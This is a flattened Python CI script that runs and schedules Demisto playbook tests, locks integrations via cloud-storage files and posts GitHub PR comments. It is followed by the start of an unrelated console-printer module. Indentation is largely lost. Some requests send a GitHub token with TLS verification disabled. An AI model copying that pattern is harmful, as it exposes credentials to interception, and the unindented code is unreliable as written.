prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
        # Collect the integration with empty params; real params are filled in later by set_integration_params.
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests, is_filter_configured,
filtered_tests, skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server, build_name, prints_manager, is_ami, thread_index=thread_index)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
env_results_path = './env_results.json'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
if not os.path.isfile(env_results_path):
print_warning(f'Did not find {env_results_path} file, assuming server version is {default_version}.')
return default_version
with open(env_results_path, 'r') as json_file:
env_results = json.load(json_file)
instances_ami_names = set([env.get('AmiName') for env in env_results if ami_env in env.get('Role', '')])
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
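# Illustrative sketch (not part of the original script; the AMI name is
# hypothetical): the naming pattern the regular expression above is meant to
# extract the version from.
def _extract_server_version_example():
    ami_name = 'Demisto-Circle-CI-Content-GA-6.0.0-12345'
    extracted = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}', ami_name)
    assert extracted == ['6.0.0']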
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
        prints_manager.add_print_job('no tests are configured for execution', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
# turn off telemetry
turn_off_telemetry(server, demisto_api_key)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(demisto_api_key, server, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(demisto_api_key, server, proxy.ami.docker_ip + ':' + proxy.PROXY_PORT)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_api_key, prints_manager,
thread_index=thread_index)
proxy.configure_proxy_in_demisto(demisto_api_key, server, '')
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_api_key, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
prints_manager.add_print_job(f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}',
print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks if the string representation of the current test configuration is already in
the executed_in_current_round set.
    If it is, it means this test has already been executed, i.e. a full round was completed and there are tests
    that could not be locked by this execution.
    In that case we start monitoring a new round by emptying the 'executed_in_current_round' set and sleeping
    in order to let the locked tests be released.
Args:
executed_in_current_round: A set containing the string representation of all tests configuration as they appear
in conf.json file that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
A new executed_in_current_round set which contains only the current tests configuration if a round was completed
else it just adds the new test to the set.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
        tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be run
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
        # This case is rare, and usually occurs in one of two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
else:
file_path = "./Tests/is_build_passed_{}.txt".format(tests_settings.serverVersion.replace(' ', ''))
with open(file_path, "w") as is_build_passed_file:
is_build_passed_file.write('Build passed')
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
            print_warning('Add pull request comment failed: There is more than one open pull request for branch {}.'
                          .format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
    res_dict = response.json()
    # Check the HTTP response object itself; the parsed dict has no 'ok' attribute.
    if not response.ok:
        print_warning('Add pull request comment failed: {}'.
                      format(res_dict.get('message')))
    return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
Execution is as following:
* Attempts to lock the test's integrations and yields the result of this attempt
* If lock attempt has failed - yields False, if it succeeds - yields True
* Once the test is done- will unlock all integrations
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
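# Illustrative sketch (not part of the original script; argument values are
# placeholders): how acquire_test_lock is consumed - the yielded flag tells the
# caller whether the integrations were locked, and unlocking happens on exit.
def _acquire_test_lock_example(integrations, prints_manager, conf_json_path):
    with acquire_test_lock(integrations, 300, prints_manager, 0, conf_json_path) as locked:
        if locked:
            pass  # run the test here
        else:
            pass  # re-queue the test and retry once the integrations are free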
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
    This method safely unlocks the test's integrations.
    If an unexpected error occurs, its details are logged and the execution of other tests continues.
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
# executing the test could take a while, re-instancing the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
    This method safely locks the test's integrations and returns the result.
    If an unexpected error occurs, its details are logged and False is returned.
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
if integration_names:
print_msg = f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}'
else:
print_msg = 'No integrations to lock'
prints_manager.add_print_job(print_msg, print, thread_index, include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
This method takes a workflow id and checks if the workflow is still running
If the given workflow ID is the same as the current workflow, this will simply return True,
otherwise it will query the CircleCI API for the workflow and return whether it is still running
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
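# Hedged note (an assumption about the response shape): the CircleCI v2 workflow endpoint
# returns JSON such as {"id": "...", "status": "running", ...}. Any status other than
# "canceled"/"success"/"failed" is treated above as still running, and so is any failure
# to query the API.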
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
# Each file has content in the form of <workflow-id>:<circleci-build-number>:<timeout in seconds>
# If it has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
f'Could not lock integration {integration}, another lock file already exists with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
"""
Since test details can have one integration as a string and sometimes a list of integrations - this method
parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
the integration names in a list for all the integrations that takes place in the test
specified in test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock file for each integration specified in 'integrations_generation_number'.
Each file contains <workflow-id>:<circle-ci-build-number>:<test-timeout>
where the <workflow-id> and <circle-ci-build-number> parts are for debugging and troubleshooting
and the <test-timeout> part makes it possible to unlock files left behind by revoked tests.
If the lock file creation fails for any of the integrations - the files that were already created will be cleaned up.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
test_timeout: The test timeout in seconds (a 30-second buffer is added when writing the lock)
thread_index: The index of the thread that executes the locking
Returns:
True if all the lock files were created successfully, else False
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
f'Could not lock integration {integration}, file creation failed with a precondition failure. '
f'Delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete all integration lock files for integrations specified in 'locked_integrations'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
# Verifying build number is the same as current build number to avoid deleting other tests lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that have a blob object.
"""
# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
Checks if the time that passed since the creation of the 'lock_file' is more than 'lock_timeout'.
If not - it means that the integration represented by the lock file is currently locked and being tested in another build
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
True if the lock has exceeded its timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
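# Hedged example (values are made up): a lock blob written by create_lock_files() holds
# "<workflow-id>:<build-number>:<timeout-seconds>", e.g. "1a2b3c4d:5678:330", and
# lock_expired() treats it as expired once
# datetime.now(tz=utc) - lock_file.updated >= timedelta(seconds=330).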
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 45 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
printer.py
|
# coding: utf8
from __future__ import unicode_literals, print_function
import datetime
from collections import Counter
from contextlib import contextmanager
from multiprocessing import Process
import itertools
import sys
import time
import os
import traceback
from .tables import table, row
from .util import wrap, supports_ansi, can_render, locale_escape
from .util import MESSAGES, COLORS, ICONS
from .util import color as _color
class Printer(object):
def __init__(
self,
pretty=True,
no_print=False,
colors=None,
icons=None,
line_max=80,
animation="⠙⠹⠸⠼⠴⠦⠧⠇⠏",
animation_ascii="|/-\\",
hide_animation=False,
ignore_warnings=False,
env_prefix="WASABI",
timestamp=False,
):
"""Initialize the command-line printer.
pretty (bool): Pretty-print output (colors, icons).
no_print (bool): Don't actually print, just return.
colors (dict): Add or overwrite color values, name mapped to value.
icons (dict): Add or overwrite icons. Name mapped to unicode icon.
line_max (int): Maximum line length (for divider).
animation (unicode): Steps of loading animation for loading() method.
animation_ascii (unicode): Alternative animation for ASCII terminals.
hide_animation (bool): Don't display animation, e.g. for logs.
ignore_warnings (bool): Do not output messages of type MESSAGE.WARN.
env_prefix (unicode): Prefix for environment variables, e.g.
WASABI_LOG_FRIENDLY.
timestamp (bool): Print a timestamp (default False).
RETURNS (Printer): The initialized printer.
"""
env_log_friendly = os.getenv("{}_LOG_FRIENDLY".format(env_prefix), False)
env_no_pretty = os.getenv("{}_NO_PRETTY".format(env_prefix), False)
self._counts = Counter()
self.pretty = pretty and not env_no_pretty
self.no_print = no_print
self.show_color = supports_ansi() and not env_log_friendly
self.hide_animation = hide_animation or env_log_friendly
self.ignore_warnings = ignore_warnings
self.line_max = line_max
self.colors = dict(COLORS)
self.icons = dict(ICONS)
self.timestamp = timestamp
if colors:
self.colors.update(colors)
if icons:
